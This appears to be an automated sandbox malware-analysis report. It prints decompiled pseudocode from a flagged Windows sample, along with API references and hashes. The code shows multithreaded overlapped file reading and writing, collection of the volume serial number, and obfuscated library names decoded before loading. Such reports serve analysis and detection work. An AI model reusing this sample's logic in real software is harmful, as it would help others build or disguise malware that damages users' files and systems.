            				 *((intOrPtr*)(_t18 + 0x154)) = _a8;
            				if( *0x9c22d8 == 1) {
            					_t15 =  *((intOrPtr*)(_t18 + 0x24));
            					_t11 =  *((intOrPtr*)(_t18 + 0x20));
            					_t22 = _t15;
            					if(_t22 >= 0 && (_t22 > 0 || _t11 > 0x100000)) {
            						asm("sbb ecx, 0x0");
            						_push(_t15);
            						E009B7636(_t18, _t11 - 0x100000);
            						_t19 = _t19 + 0xc;
            					}
            				}
            				_t17 = _t18 + 0x28;
            				_t9 = E009B7650(_t18, _t18 + 0x28, 0xe8); // executed
            				_t20 = _t19 + 0xc;
            				while(_t9 == 0) {
            					_t9 = RtlGetLastWin32Error();
            					if(_t9 == 0x3e5) {
            						break;
            					}
            					E009B575C(_t9, 0x64);
            					_t9 = E009B7650(_t18, _t17, 0xe8);
            					_t20 = _t20 + 0x10;
            				}
            				return _t9;
            			}

            APIs
            • RtlGetLastWin32Error.NTDLL ref: 009B3781
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastWin32
            • String ID:
            • API String ID: 3973360955-0
            • Opcode ID: 229593a323d3f607464ee939bad0082ce7b785b7330c1e10f83c000fe8d54daa
            • Instruction ID: 23359b76a3497c77e590eb6765fa21f3140026baa79f443bb1bb0031bf3211bc
            • Opcode Fuzzy Hash: 229593a323d3f607464ee939bad0082ce7b785b7330c1e10f83c000fe8d54daa
            • Instruction Fuzzy Hash: EE0120F5900A049BE724AA6CDFCDFEB739CDBC4734F008628F50586241DA70EE014362
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E009B36AB(void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
            				long _t17;
            				void* _t19;
            				intOrPtr _t21;
            				void* _t22;
            				void* _t23;
            
            				_t19 = __edx;
            				_t21 = _a4;
            				E009B8241(_t21 + 0x110, _t21 + 0x15c, _t21 + 0x15c, _a8);
            				 *((intOrPtr*)(_t21 + 0x154)) = _a12;
            				 *((intOrPtr*)(_t21 + 0x150)) = 2;
            				asm("cdq");
            				_push(_t19);
            				E009B7636(_t21,  ~_a8);
            				_t17 = E009B7650(_t21, _t20, _a8); // executed
            				_t23 = _t22 + 0x28;
            				while(_t17 == 0) {
            					_t17 = RtlGetLastWin32Error();
            					if(_t17 != 0x3e5) {
            						E009B575C(_t17, 0x64);
            						_t17 = E009B7650(_t21, _t20, _a8);
            						_t23 = _t23 + 0x10;
            						continue;
            					}
            					break;
            				}
            				return _t17;
            			}

            APIs
              • Part of subcall function 009B7650: WriteFile.KERNELBASE(?,?,009B3655,00000000,?,?,009B36F5,?,?,?,?,?), ref: 009B7662
            • RtlGetLastWin32Error.NTDLL ref: 009B36FA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ErrorFileLastWin32Write
            • String ID:
            • API String ID: 2457671358-0
            • Opcode ID: 13aeb1a6d35ee968a50246aa07041ffbced5da158a67f1b54762a0a873672283
            • Instruction ID: 6716994a74e5d9c2bb60b1ca829ac3665e0491302919e4d8fe50af249fdbecff
            • Opcode Fuzzy Hash: 13aeb1a6d35ee968a50246aa07041ffbced5da158a67f1b54762a0a873672283
            • Instruction Fuzzy Hash: 27F0CDB6500E08FBCB11AFA9CD4AFDF77ADDFC9324F004418F91986201D670960087B1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B74DF(void* __eflags, intOrPtr* _a4, intOrPtr _a8, long _a12, _Unknown_base(*)()* _a16) {
            				intOrPtr _t7;
            				void* _t8;
            				void* _t9;
            				intOrPtr* _t21;
            
            				_t7 = E009B490B(_a8); // executed
            				_t21 = _a4;
            				 *_t21 = _t7;
            				if(_t7 != 0) {
            					_t8 = CreateIoCompletionPort(0xffffffff, 0, 0, _a12);
            					 *(_t21 + 4) = _t8;
            					if(_t8 != 0) {
            						_t9 = E009B748F(_t21, _a16); // executed
            						if(_t9 != 0) {
            							return 1;
            						}
            						E009B4928( *_t21);
            						E009B4BEE( *(_t21 + 4));
            						L4:
            						goto L1;
            					}
            					E009B4928( *_t21);
            					goto L4;
            				}
            				L1:
            				return 0;
            			}

            APIs
              • Part of subcall function 009B490B: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,009B74EB,?,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4920
            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,009B3561,00000000,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B7502
              • Part of subcall function 009B748F: CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 009B74B3
              • Part of subcall function 009B4928: HeapDestroy.KERNELBASE(00000000,?,009B752F,00000000,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B492E
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Create$Heap$ChangeCloseCompletionDestroyFindNotificationPortThread
            • String ID:
            • API String ID: 1739922738-0
            • Opcode ID: 5bda4891e0ba8f98cc1b74d096a6d667fa6a7933792bd61dd0df9eed6c30bab3
            • Instruction ID: 79aeb080ddbc09108d33567936f72830d600d405c59b9b991226b033c992651c
            • Opcode Fuzzy Hash: 5bda4891e0ba8f98cc1b74d096a6d667fa6a7933792bd61dd0df9eed6c30bab3
            • Instruction Fuzzy Hash: 08F0F63100C207AADF212FA0AE01BD6BB9AEF80772F204E28F456D50A1EB21D8106640
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B7430(intOrPtr* _a4, intOrPtr* _a8) {
            				void* _t13;
            				long _t18;
            				intOrPtr* _t19;
            
            				 *_a8 = 1;
            				_t18 = 0; // executed
            				_t9 = E009B53F1(); // executed
            				_t19 = _a4;
            				if((_t9 & 0x7fffffff) > 0) {
            					do {
            						PostQueuedCompletionStatus( *(_t19 + 4), 0, 0, 0);
            						_t18 = _t18 + 1;
            						_t13 = E009B53F1();
            						_t9 = _t13 + _t13;
            					} while (_t18 < _t13 + _t13);
            					L4:
            					while( *((intOrPtr*)(_t19 + 8)) != 0) {
            						_t9 = E009B575C(_t9, 0x64);
            					}
            					E009B4928( *_t19); // executed
            					return E009B4BEE( *(_t19 + 4));
            				}
            				goto L4;
            			}

            APIs
              • Part of subcall function 009B53F1: GetSystemInfo.KERNELBASE(?,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B53FB
            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,00000001,00000000,00000000,?,009B3553,?,009C1D84,?,?,00000000,00000000), ref: 009B7458
              • Part of subcall function 009B575C: Sleep.KERNEL32(?,?,009B7473,00000064,00000001,00000000,00000000,?,009B3553,?,009C1D84,?,?,00000000,00000000), ref: 009B5762
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CompletionInfoPostQueuedSleepStatusSystem
            • String ID:
            • API String ID: 883128096-0
            • Opcode ID: 69cedf338f8397d3502e925561092569730ed3d564a68615f4cb5cec9fe6061e
            • Instruction ID: a5004ff99f9f3a7bccebee7b54386947eaa637ae81a02face96b36b665f9b061
            • Opcode Fuzzy Hash: 69cedf338f8397d3502e925561092569730ed3d564a68615f4cb5cec9fe6061e
            • Instruction Fuzzy Hash: 48F0BB72108304AFD7003F65EDC1B9BBBDFDBC07B57114529F559861A2DA31EC405610
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B748F(void* _a4, _Unknown_base(*)()* _a8) {
            				signed int _t8;
            				void* _t11;
            				void* _t14;
            				struct _SECURITY_ATTRIBUTES* _t18;
            				void* _t19;
            
            				_t19 = _a4;
            				_t18 = 0;
            				 *((intOrPtr*)(_t19 + 8)) = 0;
            				_t8 = E009B53F1(); // executed
            				if((_t8 & 0x7fffffff) <= 0) {
            					L3:
            					return 1;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t11 = CreateThread(0, 0, _a8, _t19, 0, 0); // executed
            					if(_t11 == 0) {
            						break;
            					}
            					 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) + 1;
            					E009B4BEE(_t11); // executed
            					_t18 =  &(_t18->nLength); // executed
            					_t14 = E009B53F1(); // executed
            					if(_t18 < _t14 + _t14) {
            						continue;
            					}
            					goto L3;
            				}
            				return 0;
            			}

            APIs
              • Part of subcall function 009B53F1: GetSystemInfo.KERNELBASE(?,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B53FB
            • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 009B74B3
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindInfoNotificationSystemThread
            • String ID:
            • API String ID: 908986755-0
            • Opcode ID: bc5e02d1e18566be515da3f1130aa107284bd13c07b9ad2e5f2a06bcd3e29a8b
            • Instruction ID: 0009a36b4a478bc7068426f906d82011c552f741468ab1d31223f8ef3227a71f
            • Instruction Fuzzy Hash: 27F0A7726087187E97002BB6ED80AABBBDEDAC53F93104935B55AC2161D570DC419560
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B3236(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				void* _t10;
            				long _t11;
            				intOrPtr _t16;
            				intOrPtr _t17;
            				void* _t18;
            				void* _t19;
            
            				_t17 = _a8;
            				_t16 = _t17 + 0x15c;
            				 *((intOrPtr*)(_t17 + 0x150)) = 1;
            				 *((intOrPtr*)(_t17 + 0x154)) = _a12;
            				_t10 = E009B761C(_t17, _t17 + 0x15c,  *((intOrPtr*)(_t17 + 0x158))); // executed
            				_t19 = _t18 + 0xc;
            				while(_t10 == 0) {
            					_t11 = RtlGetLastWin32Error();
            					if(_t11 != 0x3e5) { // 0x3e5 == ERROR_IO_PENDING: the overlapped read is still in flight
            						if(_t11 == 0x26) { // 0x26 == ERROR_HANDLE_EOF
            							return E009B2E8C(_a4, _t17);
            						}
            						E009B575C(_t11, 0x64);
            						_t10 = E009B761C(_t17, _t16,  *((intOrPtr*)(_t17 + 0x158)));
            						_t19 = _t19 + 0x10;
            						continue;
            					}
            					return _t11;
            				}
            				return _t10;
            			}

            APIs
              • Part of subcall function 009B761C: ReadFile.KERNELBASE(?,?,009B3660,00000000,?,?,009B3264,?,?), ref: 009B762E
            • RtlGetLastWin32Error.NTDLL ref: 009B3269
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: ErrorFileLastReadWin32
            • String ID:
            • API String ID: 3522703849-0
            • Opcode ID: bb8bcbb3200b94efafe530ef17ff692b3b4020df5f70da5ef7586d84d7e8f414
            • Instruction ID: 293b66d2484562cef8b82d539511f359e2cff34ce0365dafce02a137b3b088f7
            • Instruction Fuzzy Hash: ACF02B31404B44EBCB206BAADE4EFDF7BACDFC6330F00492AF52856241DA7166548792
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B75BB(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28) {
            				void* _t17;
            				intOrPtr _t18;
            				intOrPtr _t27;
            
            				_t27 = _a4;
            				 *((intOrPtr*)(_t27 + 0xc)) = 0;
            				 *((intOrPtr*)(_t27 + 8)) = 0;
            				_t17 = CreateFileW(_a8, _a20, _a24, 0, _a28, 0x48000000, 0); // executed; 0x48000000 == FILE_FLAG_OVERLAPPED | FILE_FLAG_SEQUENTIAL_SCAN
            				 *(_t27 + 0x14) = _t17;
            				if(_t17 != 0xffffffff) {
            					_t18 = E009B6253(_a8);
            					 *((intOrPtr*)(_t27 + 0x18)) = _t18;
            					if(_t18 != 0) {
            						 *((intOrPtr*)(_t27 + 0x20)) = _a12;
            						 *((intOrPtr*)(_t27 + 0x24)) = _a16;
            						return 1;
            					}
            					E009B4BEE( *(_t27 + 0x14));
            				}
            				return 0;
            			}

            APIs
            • CreateFileW.KERNELBASE(C0000000,?,00000000,00000000,009B3060,48000000,00000000,00000000,?,009B3060,00000000,?,?,00000000,C0000000,00000000), ref: 009B75DD
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 9006763fe67aabcf5423277f855b413a25f2c3fa08042222a028ed665ee140ba
            • Instruction ID: b8984edfde7001a57c3f31246421e4d3edfd03d3bc399994e3a2aebaf8f5aaf3
            • Instruction Fuzzy Hash: 6D013175418605EFDB209F75DD409AABBE9FF48330B108A29FC56C2650E731E8109B54
            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E009B576A() {
            				long _v8;
            				long _t7;
            				signed int _t9;
            				WCHAR* _t16;
            
            				_t16 = E009B5C24();
            				_t7 = 0;
            				if(_t16 != 0) {
            					_t16[3] = 0; // truncate the Windows directory path to its root, e.g. "C:\"
            					_t9 = GetVolumeInformationW(_t16, 0, 0,  &_v8, 0, 0, 0, 0); // executed;  &_v8 receives the volume serial number
            					asm("sbb eax, eax");
            					_v8 = _v8 &  ~_t9;
            					E009B4999(_t16);
            					_t7 = _v8;
            				}
            				return _t7;
            			}

            APIs
              • Part of subcall function 009B5C24: GetWindowsDirectoryW.KERNEL32(00000000,00000000,00000000,009B5774,00000000,00000022,?,009B5007,00000000,00000001), ref: 009B5C29
            • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,009B5007,00000000,00000001), ref: 009B578D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: DirectoryInformationVolumeWindows
            • String ID:
            • API String ID: 3487004747-0
            • Opcode ID: d3f29e18555a47df590614db0c72e429346cab0059cb1c4e70c5a78d8cdcf56e
            • Instruction ID: 2a9c6400cb0f1eee0ff3c09c5e9c2534c75152cc98f7a76d8c8fe4612a128823
            • Instruction Fuzzy Hash: 12E06DB2925618BF6B18E7A4ED0BCFBB3ACDE01221310465EF801C6100FA61AE0052A8
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B6F6F() {
            				char _v5;
            				char _v12;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x367, 0xe, 7,  &_v12); // writes the 7-byte library name passed to LoadLibraryA below into the buffer at  &_v12
            				_v5 = 0; // _v5 is offset 7 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v12); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6FA1
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 0dcbea5234a1d9a9a28e993079d71ecb6ad4a159c59055f4b11f3beff32faa02
            • Instruction ID: ecf6db5562a4868cf71a561a1622939e91284bff129e66fca12606143a2e17a7
            • Instruction Fuzzy Hash: 1DD0129298838C7AE611E2D4DC03FED775C8785714F81019ABA48A6581E9A6D65442B2
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B72A6() {
            				char _v5;
            				char _v16;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x5b4, 6, 0xb,  &_v16); // writes an 11-byte library name into the buffer at  &_v16
            				_v5 = 0; // offset 11 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v16); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B72D9
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 7bc053cebddb7cdc1111ce646f85db147ce01b2c906aa1520f4f5a84d4afae88
            • Instruction ID: a9ba0c40cde907b715d6257be20d957b4cec6e88416052e57a61e47081e25f4a
            • Instruction Fuzzy Hash: 44D05B61D8434C75D621F6E45C03F9E735C8785714F8101D5BE18D61C2EAA2971587E3
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B6EF1() {
            				char _v5;
            				char _v16;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x71a, 0xd, 0xb,  &_v16); // writes an 11-byte library name into the buffer at  &_v16
            				_v5 = 0; // offset 11 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v16); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6F24
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 39c8e5ac199bad6199c67db8c2ed9978854c9a9a2a7793027f7f806457f2415c
            • Instruction ID: 0a37131ee298549435cd53125c4ad43ed8ebc60d89de4e2f1cc596e9dac7f3cc
            • Instruction Fuzzy Hash: 7BD02B61D8434C35D610F2E85C03FDD735C8784700F8001D6BE08D60C2E9A1921483F3
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B726D() {
            				char _v8;
            				char _v20;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x102, 8, 0xc,  &_v20); // writes a 12-byte library name into the buffer at  &_v20
            				_v8 = 0; // offset 12 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v20); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B72A0
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 7a2548e2b12aaa8c17b7cba770a80ae7aafcf244e24c550e050761b9d7cfce96
            • Instruction ID: 25d59aa53f22cf5481cc73268a0ade3b28c1d7611e5bfcafcf879f00392904be
            • Instruction Fuzzy Hash: 73D0126198434875E710F2E84D03FBE775C9785714F850599BE58961C2E9A1961443A2
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B738A() {
            				char _v7;
            				char _v16;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x14c, 0xe, 9,  &_v16); // writes a 9-byte library name into the buffer at  &_v16
            				_v7 = 0; // offset 9 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v16); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B73BD
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 2781e5dee87ce8d22ef109c808603513ecacc800862ca17c82e8181d5786c81f
            • Instruction ID: 0c57ee9720e9b7167c5543ebc7c271f700f335d75d9cfbf922d6b6c1c9bcb060
            • Instruction Fuzzy Hash: 57D05B65D4438C79E610F2E49D03FDD775C8785714F8101D5BE18E61C2E9A1D61483E3
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B6FA7() {
            				char _v8;
            				char _v20;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x291, 9, 0xc,  &_v20); // writes a 12-byte library name into the buffer at  &_v20
            				_v8 = 0; // offset 12 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v20); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6FDA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 01a037ba32745197a6ed4473188666aeb59a16dbaf4d2fc16b176e1af9838576
            • Instruction ID: 5d24f23509d37380353a7e508f7b141fa595c31745fe69ae02e6e2fa4700c9c2
            • Instruction Fuzzy Hash: C5D02B5194034C79E710F2E84C03FBE735C8784700F810189BE18A70C3E9A1861043F3
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B6F2A() {
            				char _v7;
            				char _v16;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x7fa, 0xa, 9,  &_v16); // writes a 9-byte library name into the buffer at  &_v16
            				_v7 = 0; // offset 9 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v16); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6F5D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 281f2294b740ebd8828daf713238b968fdd330675ef53e9f885f5b41d068dc29
            • Instruction ID: ad8a0373c84152a1c7d8753c579fe5aa2371671eec4678f73948925c8c134343
            • Instruction Fuzzy Hash: A9D02B91D8434C39D610F2E45C43FAC735C8785700F8101D5BE0CD60C2EDA1921483E3
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B7351() {
            				char _v5;
            				char _v16;
            				struct HINSTANCE__* _t8;
            
            				E009B5E33(0x9c1338, 0x269, 9, 0xb,  &_v16); // writes an 11-byte library name into the buffer at  &_v16
            				_v5 = 0; // offset 11 of that buffer: the terminating NUL
            				E009B70D1(0x69335005);
            				_t8 = LoadLibraryA( &_v16); // executed
            				return _t8;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B7384
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 11e988d3285495ab9a18706a2feaecb19a53f22b06be3ebfbb250548fabff087
            • Instruction ID: 4ddc051b9e3a3a5585c9450ff891cb7d5c4c1163ed2cfbcd5d13d9607b9e7100
            • Instruction Fuzzy Hash: 8ED05B65D8434C79D611F2E49C03F9D735C8785714F8101D5BE18D61C2EDA2961583E3
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B740B(intOrPtr _a4, void* _a8, long _a12) {
            				void* _t8;
            				intOrPtr _t12;
            
            				_t12 = _a4;
            				_t8 = CreateIoCompletionPort(_a8,  *(_t12 + 4), _a12, 0); // executed; associates handle _a8 with the existing port stored at _t12 + 4
            				return 0 |  *(_t12 + 4) == _t8; // success iff the call returned that same port handle
            			}

            APIs
            • CreateIoCompletionPort.KERNELBASE(?,?,009B38D6,00000000,00000000,?,009B38D6,?,?,00000000), ref: 009B741D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: CompletionCreatePort
            • String ID:
            • API String ID: 499945625-0
            • Opcode ID: 423de82462f1e38ec1dd7140e9d5f5d76cbaad56ce58fed57ec28620351636d9
            • Instruction ID: 8930bd6fa3013fbf831a09964d14b5e28d106ea97de60903ec59c6db574c942c
            • Instruction Fuzzy Hash: 2FD0A733104318BFCF004F94EC01AC67BA8FF08B50F008029F51A86050D332F810DB84
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B7895(WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
            				void* _t6;
            
            				_t6 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
            				_t7 =  ==  ? 0 : _t6;
            				return  ==  ? 0 : _t6;
            			}

            APIs
            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,009B415C,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009B78AB
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 021528bef9d09d0f9a10f741f9bbe1aa3398a99c5a868a5b9071f6613b756f7f
            • Instruction ID: c303d6742f92ed4ba727204460774ad1e5b215ede620eb53932fb9822df55332
            • Instruction Fuzzy Hash: B1D0923214428DBFDF165FA1DC02F9A3F66AF09760F504618FA29980E0D672E470AB98
            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B48EE(void* _a4, long _a8) {
            				void* _t4;
            
            				if(_a8 != 0) {
            					_t4 = RtlAllocateHeap(_a4, 8, _a8); // executed; 8 == HEAP_ZERO_MEMORY
            					return _t4;
            				} else {
            					return 0;
            				}
            			}

            APIs
            • RtlAllocateHeap.NTDLL(009B1C68,00000008,00000000), ref: 009B4903
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: f71e7e996f2d891c394e2bba39de510daab75f2891f98c0ff9a4bdbb3fbcd310
            • Instruction ID: 375c3385845fa6c7a51e49b866c074ade8e9862be6df7087e56822c7b3707752
            • Instruction Fuzzy Hash: BAC0123148860CAEDF004E94EC05BA83BA9AB10326F00C420FA1C48462C77695A0AB40
            Uniqueness Score: -1.00%

            APIs
            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,009B1A5D,00000000,00000000,?,00000000,?), ref: 009B5331
            Yara matches
            Similarity
